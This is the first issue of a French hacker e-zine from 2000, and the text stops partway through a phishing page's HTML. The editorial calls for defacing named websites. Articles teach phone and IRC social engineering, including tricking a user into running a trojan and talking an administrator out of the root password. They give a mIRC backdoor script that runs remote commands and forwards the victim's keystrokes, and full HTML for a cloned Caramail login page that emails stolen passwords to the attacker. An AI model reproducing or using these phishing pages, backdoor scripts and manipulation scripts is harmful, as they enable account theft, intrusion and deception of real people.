           


           01010101010           010101010101            010101010101             
          1 --------- 0         1 ---------- 1           1 ---------- 0         
          0 ---------- 1        0 ---------- 0           0 ---------- 1         
          1 ---------- 0        1 -- 10101010            1 ---------- 0          
          0 ---------- 1        0 -- 0                   0 ----0101010    
          1 --------- 0#########1 -- 101010101###########1 --- 1############     
          0 -- 101010  #  hAcK  0 ---------- 0    dA     0 --- 0   pLAnEt  #          
          1 -- 010101  #        1 ---------- 1           1 --- 1     ;)    #        
          0 --------- 1#########010101010 -- 0###########0 --- 0############     
          1 ---------- 0                1 -- 1           1 --- 1010101        
          0 ---------- 1         10101010 -- 0           0 ---------- 1          
          1 ---------- 0        0 ---------- 1           1 ---------- 0         
          0 --------- 1         1 ---------- 0           0 ---------- 1       
           10101010101           010101010101             101010101010   
                      
                        
                      
                        
                   


,-*'^'~*-.,_,.-**-.,_,.-*~'^'*-,-*'^'~*-.,_,.-**-.,_,.-*~'^'*-,-*'^'~*-.,_,.-**-.
,-*'^'~*-.,_,.-**-.,_,.-*~'^'*-,-*'^'~*-.,_,.-**-.,_,.-*~'^'*-,-*'^'~*-.,_,.-**-.


                             Brain Storm Crew 
                          Issue #1 Septembre 2000

 
 Contacts:
===========
URL :      www.bsc.fr.st
Mail :     bsc@fr.st      

                

,-*'^'~*-.,_,.-**-.,_,.-*~'^'*-,-*'^'~*-.,_,.-**-.,_,.-*~'^'*-,-*'^'~*-.,_,.-**-.
,-*'^'~*-.,_,.-**-.,_,.-*~'^'*-,-*'^'~*-.,_,.-**-.,_,.-*~'^'*-,-*'^'~*-.,_,.-**-.


                                 MEMBRES
                                =========

   Nick                          Spcialit(s)                         e-mail
 
   NOs-K                         Articles mag,                   nosk@cybercable.fr
(fondateur)                      MAJ web site

  Elgadir                         Rdac'chef,                    elgadir@usa.net 
(fondateur)                      Articles mag

  sKoop                            Webmaster                     skoop@programmer.net
                                 Articles mag

[_M_A_D_]                         Lance patat                    doctor_mad@caramail.com
                                       ;)

 Scurt                           Articles mag                    scurt@caramail.com
 
 a2_b2                           Articles mag
                             


,-*'^'~*-.,_,.-**-.,_,.-*~'^'*-,-*'^'~*-.,_,.-**-.,_,.-*~'^'*-,-*'^'~*-.,_,.-**-.
,-*'^'~*-.,_,.-**-.,_,.-*~'^'*-,-*'^'~*-.,_,.-**-.,_,.-*~'^'*-,-*'^'~*-.,_,.-**-.


                                DISCLAIMER
                         =======================


Ou comment se faire chier pour dire quelque chose que personne ne lira jamais... 

Vous tenez entre votre clavier un ensemble de lettres et de chiffres qui ont t mis
au hasard dans le fichier. Pour des raisons de formatages diffrents suivant les 
OS l'image ASCII risque de se dformer et crer des mots, voir malheureusement des 
insultes ou mme des phrase qui semblent correctes alors que nous avons juste voulu faire 
un dessin ! (Bon, personne n'y crois  mon histoire ASCII, on va changer de 
mthode pour la suite =))

Donc regardez ces ensembles de caractres et si les mots qui apparaissent vous donnent 
des ides et bien gardez les pour vous, marrez-vous un coup mais ne le faites pas ! En 
effet puisque personne n'a voulu crire a, les consquences  n'ont pas put tre 
values et risquent d'tre dangereuses pour vous... d'ailleurs nous, on fait ce "truc" 
pour s'amuser donc on ne pourra tre tenu pour responsable si par malheur vous 
faisiez ce qui se trouve dans ces lignes...

,-*'^'~*-.,_,.-**-.,_,.-*~'^'*-,-*'^'~*-.,_,.-**-.,_,.-*~'^'*-,-*'^'~*-.,_,.-**-.
,-*'^'~*-.,_,.-**-.,_,.-*~'^'*-,-*'^'~*-.,_,.-**-.,_,.-*~'^'*-,-*'^'~*-.,_,.-**-.


                                  Edito
                                 ======= 


	Vous avez devant les yeux, trs chers lecteurs, l'issue #1 du mag de B.S.C (Brain 
Strom Crew :)). C'est un nouveau groupe, on a fait un site avec pleins de progs et
de truc intressants (www.bsc.fr.st), mais surtout le plus gros travail de notre 
groupe sera ce mag :)

	Avant toute chose, on va vous exposer notre philosophie du hacking, et plus 
particulirement, nos motivations dans le hacking. Nous devons tous adhrer  un 
combat, mme si nous ne sommes pas tous des lites, ce combat, c'est celui contre 
les autorits et les milliardaires qui portent atteinte  la libert de tout 
individu. Je ne vais pas m'tendre sur Microsoft et sur l'attitude que doit avoir 
le hacker (ici un soldat pour la libert) par rapport  cette entreprise. Il n'y a
pas que Bill Gates qui nous prive de libert, mais aussi tous les dirigeants de 
l'OMC (organisation mondiale du commerce), dont BG fait partie, qui veulent nous 
forcer  ne boire que Coca ou Pepsi, a ne manger que mac do ou du mas 
transgnique. Ils sont extrmement vicieux, ces gens l, pour supprimer les petits
producteurs (bio par exemple :)), ils instaurent des lois sur l'hygine impossibles
 suivre et ces agriculteurs ferment les uns aprs les autres. Bon, je vais arrter
de parler des paysans, mais vous avez compris le problme de fond : nous devons 
nous battre pour qu'il n'y ait pas l'mergence d'autres Bill Gates dans des 
secteurs comme l'alimentation, les mdias, et pire la politique. En gros, des 
sites comme www.front-nat.fr ou www.wto.org (OMC) devraient tre tapisss 
en permanence des fresques de rvoltes des hackers.

Et comme disait The Mentor :

   "Vous construisez des bombes atomiques, vous financez les guerres, vous ne 
punissez pas les patrons de la mafia aux riches avocats, vous assassinez et 
trichez, vous manipulez et nous mentez en essayant de nous faire croire que c'est 
pour notre propre bien tres et nous sommes encore des criminels."

J'y ajouterais : 
   "Vous voulez supprimer notre libert d'expression, notre libert de choix, vous
avez dj supprimer la libert de vivre de millions d'tres humains : vous 
prfrez jeter ce qui est en trop plutt que de le donner gratuitement  ceux qui 
en ont besoin. Vous abrutissez les habitants des pays dveloppes grce  la TV 
pour mieux leur faire ingurgitez vos produits (informatique, alimentation...) et 
asseoir votre pouvoir encore plus.
    Voila pourquoi, nous, criminels, vous ferons comprendre cela a travers diverses 
actions..."

	Voila pour la philo, maintenant, je vais juste dire ce que je pense de la 
scne franaise. Tout le monde dit qu'elle est morte, qu'elle ne sert  rien. On 
pleurt sur Noroute et Noway, a quoi a sert? Deux excellents mags sont sorti cette 
anne et relance actuellement la scne franaise : RTC et, encore meilleur : 
Counter Strike (Tipiak). C'est vrai qu'on a pas un groupe comme 2600 ou CCC, et 
alors? Faisons avec ce qu'on a et faisons parler de la scne franaise, en nikant 
des sites comme front-nat.fr, tf1.fr, lepen.net...

  						                       Elgadir


,-*'^'~*-.,_,.-**-.,_,.-*~'^'*-,-*'^'~*-.,_,.-**-.,_,.-*~'^'*-,-*'^'~*-.,_,.-**-.
,-*'^'~*-.,_,.-**-.,_,.-*~'^'*-,-*'^'~*-.,_,.-**-.,_,.-*~'^'*-,-*'^'~*-.,_,.-**-.




     |_|       |  |_/            _  _ (_)    _  |
     | | (` \) .  | \ (` (` |)  (_ (_)   ,-.(_) | o o o
            /               |            `-'
               _
              (_)            *
   .|,    *              O
   -x-
   '|`       \ \ |//             |           *
         ( %%%)%%%/%%%   %      -+-     O
     _   %\%%%%%%%%(%%%%%/       |
      %%%%%%%%%%)%%%)%(%%\         _
       %%/ __^_   _^__ \%%%       (_)    _|_          )
      |"\=(((@))=((@)))=/"|%              |     (
     %\_( ,`--'(_)`--'. )_/ %                    \  )
    /%%( /______I______\ )%  )                    )  ,
  _/%%%%\\\_|_|_|_|_|_///%%%       ,----.-._     (  /
    %% %%\ `|_|_|_|_|' /%\%%\     /  __  `.``.    \(
  -%% %%%%`---.___,---'%%%%  )   /  / _`.__))))____`
   (  %% %             %%  \       ( @)__,._      :%##
      %                 %           \  .'  )`-----.%##
      /                              `'  ,'

	  



I. Hacking

 	 -------------------------------------------------------------
	(  1  |               Le S.E et le R.E          | N0sk        )
	 -------------------------------------------------------------
	(  2  |               La backdoor IRC           | a2_b2       )
	 -------------------------------------------------------------
	(  3  |       Le web engeenering (hack cara)    | Scurt       )
	 -------------------------------------------------------------
	(  4  |          Hacks des Pages Tripod         | N0sk        )
	 -------------------------------------------------------------
	(  5  |           Les Fichiers Password         | N0sk        )
	 -------------------------------------------------------------
      (  6  |               Les wingates              | sKoop       )
                  -------------------------------------------------------------


II. Protocoles rseaux et Internet

 	 -------------------------------------------------------------
	(  7  |                Le Protocole IP          | N0sk        )
	 -------------------------------------------------------------
	(  8  |                IRC par telnet           | sKoop       )
	 -------------------------------------------------------------
      (  9  |                FTP par telnet           | sKoop       )
       -------------------------------------------------------------
      (  10 |               Le FTP et le TFTP         | N0sk        )
	 -------------------------------------------------------------


III. Phreaking

 	 -------------------------------------------------------------
	(  11 |  			Les cabines FT          | sKoop       )
 	 -------------------------------------------------------------
      (  12 |              Histoire du phreaking      | Elgadir     )
       -------------------------------------------------------------
      (  13 |                   VMB/PABX              | Elgadir     )
       ------------------------------------------------------------- 
      (  14 |                 Phoner gratis           | NOsk        )
       ------------------------------------------------------------- 


IV. Programmation

	 -------------------------------------------------------------
	(  15 |              Programmation Batch        | N0sk        )
	 -------------------------------------------------------------


V. Dlires, humour 

 	 -------------------------------------------------------------
	(  16 |  			Les lamers ;)           | Elgadir     )
 	 -------------------------------------------------------------
      (  17 |            Le Mad. Rocket. Launcher     | [_M_A_D_]   )
	 -------------------------------------------------------------
      (  18 |           Bien utiliser un no de CB     | Elgadir     )
       -------------------------------------------------------------


VI. Le mot de la fin



,-*'^'~*-.,_,.-**-.,_,.-*~'^'*-,-*'^'~*-.,_,.-**-.,_,.-*~'^'*-,-*'^'~*-.,_,.-**-.
,-*'^'~*-.,_,.-**-.,_,.-*~'^'*-,-*'^'~*-.,_,.-**-.,_,.-*~'^'*-,-*'^'~*-.,_,.-**-.


     
      *********************************************************************
	* 1											  *
	*                            Le S.E et le R.E                       *
	*      										  *
	*			 par N0s-k                                        *
	*								                    *
	*********************************************************************



Vous allez dire, encore un enime article sur le SE, bah vous avez tout a fait raison :p
Mais malgr tout ce que l'on peut dire l dessus, le S.E et le R.E sont des moyens mettant
autant, voir plus, notre esprit en action, et surtout, arriver a ses fins en tirant parti de 
la connerie humaine....


I. LE SE
########

Le S.E., ou Social Engeenering est l'art de se faire passer pour quelqu'un d'autre...et le 
plus souvent quelqu'un d'important (l'admin systme par exemple =))

Bon alors dj les prrequis pour le S.E :
- Une voix assure de ce quelle fait
- Une trs grosse paire de couille (pour les mecs...les meufs c trop facile pour elles, 
elle font a tous les jours du S.E =))
Voil, vous avez votre modulateur de voix et votre paire de couille ? 

Ok, on peut y aller...
Bon l je vais vous parlez du S.E tlphonique pour le S.E dans 'la vie relle' on verra 
a dans un autre article =) En effet le S.E tlphonique est le plus facile a mettre en 
ouvre si vous ne paniquez pas...Rien ne vaut l'exemple, vous allez envoyer un Lame'Trojan
a un type sur IRC :) (pour plus de clart, "vous" dsigne vous et "lamer" dsigne le lamer
=))

Acte I: Et le lamer mordit

La scne se droule sur IrcNet, dans le chan #jeux_en_reseau_lame
*Join Vous

(Il y a 50 bots qui vous disent bonjours, plus il y a de bot, plus il y a de lame (donc de
cible =))

vous>lo
lamer1>lo
lamer2>lo
[...]
lamer456>lo
vous> hey Lame1, tu veux te faire un jeux_en_reseaux_lame ?
lame1 vous prend en PV, s'il ne le fait pas, faites le, il est trop lame pour faire des 
message =)
lame1>quel jeux ?
vous> Tu as quoi ?
lamer1>Je les ai tous ! je suis un boss du Warez !! Je suis une 31337 man !
vous>wow
lame1>hh
vous>Tu as quoi comme connect ?
lame1>RTc 56K (en fait il peut vous repondre n'importe quoi, aucune importance...)
vous>Tiens, comme moi ! Tu connais le "Speed Bust for 56K" ?
lame1>nop c koi ?
vous> c un prog qui augmente le cash de ta RAM pour que ton 56K soit un 128K ! Ca marche 
trop bien !!!
lame1>Cool ! Je peut le telecharger o ?
vous> J'en sais rien, c'est un ami allemand qui ma 'a envoy...si tu veux je te le DCC et 
on se fait une superbe partie a 128K !
lame1> Cool, balance !
Et voila il est nik vous lui envoy et aprs vous ralisez que vous tes plus lame que 
lui d'utiliser un trojan mais c pas le sujet ;))

Un autre exemple ? Celui l est beaucoup plus intressant dans le sens ou vous allez 
recevoir dans votre mail le passwd ainsi que le login d'un type....
Tout d'abord il va vous falloir un minimum de prparation....
vous allez devoir vous crer un compte chez le fournisseur/hbergeur/maileur de votre 
victime avec comme nom pas jean_hubert mais un truc du genre sysadmin, 
administrateur, ce qui vous donnera une adresse du genre admin_systeme@truc.com...on y 
croirais presque :) (Nd Elgadir : tiens, ca me rappelle une ptite affaire... unolpac..??)
Ensuite vous devez, sur ce mme hbergeur crer une page avec un formulaire contenant 
deux cases  remplir avec devinez quoi ? Pass et login :)Et au lieu de renvoyez a vers un 
CGI envoyez direct sur l'e-mail ...aprs c'est  vous de la rendre raliste !  Par exemple
ajoutez le logo de la socit, de la pub (si c pour multimania =))et aussi vous devez 
respectez les mme couleurs...

Donc vous vous retrouvez avec votre mail: admini_sys@truc.com et votre page 
www.truc.com/admini_sys/verif.htm (donnez lui un joli nom :) hh now vous tes un admin =)


Aprs vous envoyez un mail a votre victime avec un truc dans le genre:

"Monsieur Truc,
Suite a une intrusion de notre HDD et a la prolifration d'un virus, nous nous voyons dans 
l'obligation de restructur notre socit  et pour cela nous vous invitons  vous rendre 
sur notre page scurise en SSL 128 afin de vous relogger et de recrer votre acompte.
Voici l'URL: www.truc.com/admini_sys/verif.htm
Nous vous prions de le remplir dans les 48h sous peine de voir ferm votre acompte
Veuillez agrer Nos salutations distingu... [...](faut faire professionnel =))"

Et voil le connard va sur votre joli page rentre les infos ("oh non maman ! si je me 
trompe il ferme mon site Lame !!!") et vous avez de quoi hack proprement sa page...(le 
mieux c'est de faire une mailing liste et l'envoyer  une centaine de personne =))


II. Le RE
#########

Le RE ou encore Reverse Engeenering est tout l'inverse du SE... il s'agit de se faire  
passer pour un con pour faire ressortir chez votre victime le sentiment le plus affreux de
ce monde... l'orgueil...

Je m'explique, vous vous faites passez pour un petit newbie perdu et l vot victime qui 
connat la rponse a votre problme ne va pas rflchir plus qu'il n'en faut et pour 
prouver que c'est le matre il va vous donnez la rponse sans penser aux consquences....
Comme toujours, rien ne vaux l'exemple donc en voici un :

ActE I: La scne se droule dans votre bureau et vous voulez le passe root de l'admin 
systme...

vous> Bonjour monsieur l'administrateur systme (il est au phone, faut pas qu'il voit votre
rire sadique =))
admin_con> Que puis-je pour vous ?
vous> J'ai voulu lancer xproboly (c n'importe quoi =))
admin_con>(gn de ne pas connatre) et alors ?
vous> il me dit "Don't have permission please LOGAINNEE as root " (faut prononcer comme les 
lames sinon a fait pas raliste =))
admin_con> Est-ce important ?
vous> oui et je dois partir dans 5 min
(faites a de prfrence le soir avant que tous les fonctionnaires se tirent)
admin_con> Moi aussi..bon (En gonflant le torse) j'ai la solution
admin_con>C'est trs compliqu...mais je suis pay pour a
vous> O merci vous tes mon sauveur !
admin_con>Alors vous tapez 'logout' puis 'login' et la vous tapez root...
vous>Pas si vite !! Bon c bon..il me dit "Password:", a veut dire  quoi "password" ?
admin_con>C'est du langage de pro..tapez "abcdef"
vous> en effet je n'aurais jamais put y penser !!
admin_con>Est-ce que a marche ?
vous> Oui, le logiciel marche
vous> Merci beaucoup, je parlerais de vous au directeur !
admin_con> Au revoir (et oui il est 16H00 - 5 sec =))
Clicc...

Et voila vous avez le pass de l'admin =)
ce n'est qu'un exemple...peut tre pas le meilleur mais a marche impec dans le sens o
tout les paramtres requis sont rassembl.


									N0s-k



,-*'^'~*-.,_,.-**-.,_,.-*~'^'*-,-*'^'~*-.,_,.-**-.,_,.-*~'^'*-,-*'^'~*-.,_,.-**-.
,-*'^'~*-.,_,.-**-.,_,.-*~'^'*-,-*'^'~*-.,_,.-**-.,_,.-*~'^'*-,-*'^'~*-.,_,.-**-.



      *********************************************************************
	* 2  										        *
	*                    La Backdooor IRC                               *
	*      										  *
	*			                                par a2_b2         *
	*								                    *
	*********************************************************************



	Bon, on va voir ce qu'est la backdoor irc : comment a marche,  quoi a sert, etc...
Si a marche pas ou si t'as rien compris a2_b2@nomade.fr (pkoi @nomade? ben c'est illimit 
a veut dire que tu peux avoir 100 Mo de mails il ouvre pas leur gueule. Hotmail t'as juste 
le droit  2 ou 3 Mo, je sais plus.)


Bon, allez, on y va.
Cette backdoor est extrmement utile tu vas le piger tout de suite. 
Le truc, c'est de loader un script dans l'irc de la victime ou si t'as un neuneu 
de lui faire loader grace a un peu de SE (social egeenering) :

CTCP 1:REMOTE: /$$2-

tu fous cette commande dans un txt et aprs, dans son rpertoire mirc
tu ou il tape :
/load-rs non_du_txt.txt 
voil, a c'est fait, te voil le nouveau 'root' hehhe

t'as juste  tapper 

/ctcp <nick_de_la_victime> REMOTE <commande_de_l_action_que_veut>

tu imagines tout de suite les possibilits si il est op et s il a un access au bot

/ctcp Un_op REMOTE msg X ADDUSER #channel_du_op ton_nick *!*@* 100 PassWord

trs important et c'est l le pied dans Mirc t'as la commande /run 
imagine les possibilits...
la merde c'est que la victime va voir des [votre_nick REMOTE] /....... dans son status
pour ca ben va faloir mettre en couleur, la mme que son status, la les ctcp et le tour 
est jou sauf si vous savez la couleur ...


bon le command ca vous a pas suffit, j'ai mieux, sniffer tout ce qu il dit et fait hh
fo il inclure ca ds le script 

on 1:INPUT:*: /msg ton_nick $$1

et la tu recois tout les commande et phrase tap par la victime


dans le prochain numero on verra une commande pour planter son irc d ici la envoy.....
je tiens a remerci mes source 'frhack'
encore un fois a2_b2@nomade.fr je serais ravi d'entendre vos remarques ou 
vous aider....


								a2_b2



,-*'^'~*-.,_,.-**-.,_,.-*~'^'*-,-*'^'~*-.,_,.-**-.,_,.-*~'^'*-,-*'^'~*-.,_,.-**-.
,-*'^'~*-.,_,.-**-.,_,.-*~'^'*-,-*'^'~*-.,_,.-**-.,_,.-*~'^'*-,-*'^'~*-.,_,.-**-.


      *********************************************************************
	* 3   										  *
	*                    Le web engeenering (hack caramail)             *
	*      										  *
	*			                                par Scurt         *
	*								                    *
	*********************************************************************



Voici la premire technique de hack que je vais vous apprendre.

Je lai invent mais je me suis inspir dune autre technique. Un jour  je dcouvre
quun mec envoie au abonner de Hotmail un e-mail en html qui leur fais croire 
quils ont t dconnect  cause de je ne sais plus quelle raison. Quand la 
personne qui avait reu le mail remplissait les champs pseudo et mot de passe, 
a envoyait les informations sur un script cgi (scripte cgi= cest un mini 
programme le plus souvent crit en perl). Ce script envoyait ces mmes infos  une  
adresse e-mail, mais sans passer par une messagerie.

Je pense que vous avez tous un jour entendu parler du truc ou il faut remplacer 
le tag action de cara par mailto:votrepseudo@votreserveur.com  ben cest bien 
joli mais sa sert a rien, ca ouvre Outlook (ou la messagerie par dfaut du mec),
mme le plus con des internautes va se douter de qqch.

Alors je me dit ben click droit sur la page de cara, on remplace le tag action 
par le truc qui envoie sur le cgi. Mais faut croire que cara y avait pens 
ou nest pas assez perfectionner pour envoyer un message comme celui la en html. 
Alors comme javais dj lu un livre sur le html je me suis dit ben on va pas 
se laisser baiser comme a.

Alors jai fais quoi ? ben jai repris ma fausse page cara, jai ouvert un site 
chez citeweb.net et je lai hberg. Mais le problme ctait comment envoyer 
le mec de chez cara dessus. Vous avez dj tous vu ces sites : nous avons chang 
dadresse vous aller tre rediriger dessus dans 10sec . Ben jai fais la mme chose 
mais pas dans 10sec ,tout de suite  le mec ouvre le mail a le redirige sur ma page 
hberge chez citeweb.net il croit que cara a plant (un peu comme dhabitude) 
il remplit les champs et voil tout arrive chez moi par mail. Mais la un 2me 
problme chez le mec aprs avoir remplit la page a fait rien . Il va se douter 
de qqch cest l que jutilise une des nombreuses options de ce merveilleux langage 
quest le html. Loption  redirige  comme son nom lindique a le redirige 
sur une autre page et la je met la valeur de la page qui saffiche quand on 
se trompe de mot de passe chez cara le mec crois quil a fait une faute de frappe 
il retape et la il entre normalement chez cara et moi jai son mot de passe.


Voil les deux sources html.
Ce qui est en gras cest se que vous devez changer

La 1ere celle qui vous redirige sur la fausse page cara.


<HTML>
<HEAD>
   <TITLE>1</TITLE>
   <META NAME=GENERATOR CONTENT="">
</HEAD>
<BODY TEXT="#000099" BGCOLOR="#CCCCCC" onload="document.capabilities.submit();">
<P><BR>
<BR>
<HEAD><BR>
<TITLE></TITLE><BR>
<BR>
<ME*TA content="text/html; charset=windows-1252" http-equiv=Content-Type><ME*TA <BR>
<BR>
<SCR*IPT language=JavaSCR*IPT><!--<BR>window.onerror = ignore;<P>function ignore()<BR>{<BR>}<P>function testMimeTypes()<BR>{<P>}<P>function testCookie()<BR>{<BR>document.cookie="test=ok";<BR>if(document.cookie.length>0 && document.cookie.indexOf("test=ok")>-1)<BR>{<BR>document.capabilities.cookieenabled.value="true";<BR>return;<BR>}<BR>}<P>// --></SCR*IPT><BR>
</HEAD><BR>
<BR>
caraunix erreur.</P>

<P>Please wait... <FORM ACTION="http://www.hebergeur.com/pseudo/faussepagecara.html" METHOD=POST name=capabilities>
   <P><BR>
   </P>
   
   <P><INPUT TYPE=hidden NAME=sessionkey VALUE=958506056832><BR>
   <INPUT TYPE=hidden NAME=command VALUE=scanbrowser><BR>
   <INPUT TYPE=hidden NAME=jsversion VALUE="1.0"><BR>
   <INPUT TYPE=hidden NAME=javaenabled VALUE=true><BR>
   <INPUT TYPE=hidden NAME=mimetypes VALUE=VALEUR><BR>
   <INPUT TYPE=hidden NAME=plugins VALUE=VALEUR><BR>
   <INPUT TYPE=hidden NAME=cookieenabled VALUE=false><BR>
   <INPUT TYPE=hidden NAME=hastoolbar VALUE=true><BR>
   <INPUT TYPE=hidden NAME=clientip VALUE=VALEUR><BR>
   <INPUT TYPE=hidden NAME=clientname VALUE=VALEUR><BR>

</FORM> <SCR*IPT LANGUAGE="JavaSCR*IPT1.1"><!--<BR>document.capabilities.jsversion.value="1.1";<BR>// --></SCR*IPT>
<SCR*IPT LANGUAGE="JavaSCR*IPT1.2"><!--<BR>document.capabilities.jsversion.value="1.2";<P>// --></SCR*IPT>
<SCR*IPT LANGUAGE=JavaSCR*IPT><!--<BR>testMimeTypes();<BR>testCookie();<P>// --></SCR*IPT></P>

<P><BR>
</P>
</BODY>
</HTML>


La 2me la fausse page caramail.com


<HTML>

<HEAD>
   <TITLE>Caramail</TITLE>
 
<SCRIPT language=Javascript><!--
function OpenWin() {
	window.open('loi.asp', 'Aide','width=400,height=220,resizable=no,scrollbars=no,status=no');
}
//--></SCRIPT><script LANGUAGE="JavaScript">document.Ident.LOGIN1.focus();

var zz;

x = new Date();
if (x.getYear()< 1000)
	document.Ident.TZ.value = x.getYear() + 1900;
else
	document.Ident.TZ.value = x.getYear();
zz = '00' + (x.getMonth() + 1);
document.Ident.TZ.value += zz.substring(zz.length - 2, zz.length);
zz = '00' + x.getDate();
document.Ident.TZ.value += zz.substring(zz.length - 2, zz.length);
zz = '00' + x.getHours();
document.Ident.TZ.value += zz.substring(zz.length - 2, zz.length);
zz = '00' + x.getMinutes();
document.Ident.TZ.value += zz.substring(zz.length - 2, zz.length);</script>
</HEAD>
<BODY BGCOLOR="#FFFFFF" LINK="#000000" VLINK="#000000">
<CENTER><TABLE BORDER=0 BGCOLOR="#F0E8CC" CELLSPACING=0 CELLPADDING=0>
   <TR>
      <TD ALIGN=center WIDTH=134 BGCOLOR="#CCCCFF">
         <P><IMG SRC="http://imgsrv.caramail.com/images/caramail.gif" WIDTH=112 HEIGHT=51 ALIGN=bottom></P>
      </TD>
      <TD ALIGN=center COLSPAN=7 WIDTH=470 BGCOLOR="#FFFFFF">
         <P><A HREF="http://adclick.caramail.com/cgi-bin/redirect?TYPE=PUB&FROM=6&IDBANDEAU=ANG01&TARGET=www.annoncesgratuites.com" TARGET="_blank"><IMG SRC="http://ad.caramail.com/pub/ANG01.gif" WIDTH=468 HEIGHT=60 BORDER=0 ALIGN=bottom></A><IMG SRC="http://195.25.89.17/caramail_v?total" WIDTH=1 HEIGHT=1 BORDER=0 ALIGN=bottom><SCRIPT LANGUAGE=""><!-- 
tps = new Date(); 
if (tps.getSeconds() < 4) {
document.write("<IMG SRC=\"http://195.25.89.18/caramail_p?" + tps.getMinutes() + "0" + tps.getSeconds() + "_accueil" + "\" WIDTH=\"1\" HEIGHT=\"1\">");} 
// --></SCRIPT><NOSCRIPT></P>
         
         <P><IMG SRC="http://195.25.89.18/caramail_p?noscript_accueil" WIDTH=1 HEIGHT=1 ALIGN=bottom></P>
         
         <P></NOSCRIPT></P>
      </TD>
   </TR><FORM ACTION="http://www.lecgi.net/public/form_mail.cgi" METHOD=POST>
                     <P><INPUT TYPE=hidden NAME=destinataire VALUE="votrepseudo@votrehebergeur.com">
                     <INPUT TYPE=hidden NAME=sujet VALUE=passe caramail>
                     <INPUT TYPE=hidden NAME=redirige VALUE="http://www17.caramail.com/general.asp?N=7375&C=2493&ERROR=1">
   <TR BGCOLOR="#FFFFFF">
      <TD ALIGN=center VALIGN=bottom WIDTH=134 BGCOLOR="#CCCCFF">
         <P>&nbsp;</P>
      </TD>
      <TD VALIGN=bottom WIDTH=76>
         <P><IMG SRC="http://imgsrv.caramail.com/images/vide.gif" WIDTH=76 HEIGHT=1 ALIGN=bottom></P>
      </TD>
      <TD VALIGN=bottom WIDTH=72>
         <P><IMG SRC="http://imgsrv.caramail.com/images/vide.gif" WIDTH=72 HEIGHT=1 ALIGN=bottom></P>
      </TD>
      <TD VALIGN=bottom WIDTH=40>
         <P><IMG SRC="http://imgsrv.caramail.com/images/vide.gif" WIDTH=40 HEIGHT=1 ALIGN=bottom></P>
      </TD>
      <TD VALIGN=bottom WIDTH=58>
         <P><IMG SRC="http://imgsrv.caramail.com/images/vide.gif" WIDTH=58 HEIGHT=1 ALIGN=bottom></P>
      </TD>
      <TD VALIGN=bottom WIDTH=22>
         <P><IMG SRC="http://imgsrv.caramail.com/images/vide.gif" WIDTH=22 HEIGHT=1 ALIGN=bottom></P>
      </TD>
      <TD VALIGN=bottom WIDTH=50>
         <P><IMG SRC="http://imgsrv.caramail.com/images/vide.gif" WIDTH=50 HEIGHT=1 ALIGN=bottom></P>
      </TD>
      <TD VALIGN=bottom WIDTH=152>
         <P><IMG SRC="http://imgsrv.caramail.com/images/vide.gif" WIDTH=151 HEIGHT=1 ALIGN=bottom></P>
      </TD>
   </TR>
   <TR>
      <TD ALIGN=center VALIGN=top ROWSPAN=2 WIDTH=134 BGCOLOR="#CCCCFF">
         <P><A HREF="http://adclick.caramail.com/cgi-bin/redirect?TYPE=PUB&FROM=32&IDBANDEAU=BUY09&TARGET=www.buycentral.com/fr" TARGET="_blank"><IMG SRC="http://ad.caramail.com/pub/BUY09.gif" WIDTH=100 HEIGHT=60 BORDER=0 ALIGN=bottom></A>&nbsp;</P>
      </TD>
      <TD VALIGN=bottom WIDTH=76 BGCOLOR="#FFFFFF">
         <P>&nbsp;</P>
      </TD>
      <TD VALIGN=bottom ROWSPAN=3 COLSPAN=2 WIDTH=112>
         <P><IMG SRC="http://imgsrv.caramail.com/images/cara1.gif" WIDTH=112 HEIGHT=136 ALIGN=bottom></P>
      </TD>
      <TD VALIGN=bottom COLSPAN=3 WIDTH=130>
         <P><IMG SRC="http://imgsrv.caramail.com/images/cara2.gif" WIDTH=130 HEIGHT=80 ALIGN=bottom></P>
      </TD>
      <TD ALIGN=center VALIGN=top WIDTH=152 BGCOLOR="#FFFFFF">
         <P><A HREF="http://adclick.caramail.com/cgi-bin/redirect?TYPE=PUB&FROM=31&IDBANDEAU=RDC21&TARGET=www3.rueducommerce.fr/info/showdetl.cfm%3F%26Product_ID=324956%26DID=6%26PartenaireID=1" TARGET="_blank"><IMG SRC="http://ad.caramail.com/pub/RDC21.gif" WIDTH=100 HEIGHT=60 BORDER=0 ALIGN=bottom></A></P>
      </TD>
   </TR>
   <TR><TD VALIGN=bottom WIDTH=76 BGCOLOR="#FFFFFF">
         <P><IMG SRC="http://imgsrv.caramail.com/images/vide.gif" WIDTH=76 HEIGHT=35 ALIGN=bottom></P>
      </TD>
      <TD ALIGN=center VALIGN=bottom ROWSPAN=2 COLSPAN=2 WIDTH=80>
         <P><FONT SIZE="-1"><INPUT TYPE=text NAME=LOGIN1 VALUE="" SIZE=8 MAXLENGTH=50><BR>
         <INPUT TYPE=password NAME=PASSWORD1 VALUE="" SIZE=8 MAXLENGTH=8></FONT></P>
      </TD>
      <TD VALIGN=bottom ROWSPAN=2 WIDTH=50>
         <P><IMG SRC="http://imgsrv.caramail.com/images/cara3.gif" WIDTH=50 HEIGHT=56 ALIGN=bottom></P>
      </TD>
      <TD ALIGN=center VALIGN=bottom ROWSPAN=2 WIDTH=152 BGCOLOR="#FFFFFF">
         <P><IMG SRC="http://imgsrv.caramail.com/images/droite.gif" WIDTH=152 HEIGHT=20 ALIGN=bottom></P>
      </TD>
   </TR>
   <TR>
      <TD VALIGN=bottom COLSPAN=2 WIDTH=210 BGCOLOR="#FFFFFF">
         <P><IMG SRC="http://imgsrv.caramail.com/images/hgauche.gif" WIDTH=210 HEIGHT=21 ALIGN=bottom></P>
      </TD>
   </TR>
   <TR>
      <TD ALIGN=center VALIGN=top WIDTH=134 BGCOLOR="#000040">
         <P><IMG SRC="http://imgsrv.caramail.com/images/bgauche.gif" WIDTH=134 HEIGHT=19 ALIGN=bottom></P>
      </TD>
      <TD VALIGN=bottom ROWSPAN=2 WIDTH=76 BGCOLOR="#000000">
         <P>&nbsp;</P>
      </TD>
      <TD VALIGN=top ROWSPAN=2 WIDTH=72>
         <P><IMG SRC="http://imgsrv.caramail.com/images/cara4.gif" WIDTH=72 HEIGHT=106 ALIGN=bottom></P>
      </TD>
      <TD ALIGN=center VALIGN=top COLSPAN=2 WIDTH=98>
         <P><INPUT TYPE=submit NAME=Enter VALUE=" Entrer "></P>
      </TD>
      <TD VALIGN=top ROWSPAN=2 COLSPAN=2 WIDTH=72>
         <P><A HREF="/Bin/CreationCompte2/FormulaireNomPrenom.asp"><IMG SRC="http://imgsrv.caramail.com/images/cara6.gif" WIDTH=72 HEIGHT=106 BORDER=0 ALIGN=bottom></A></P>
      </TD>
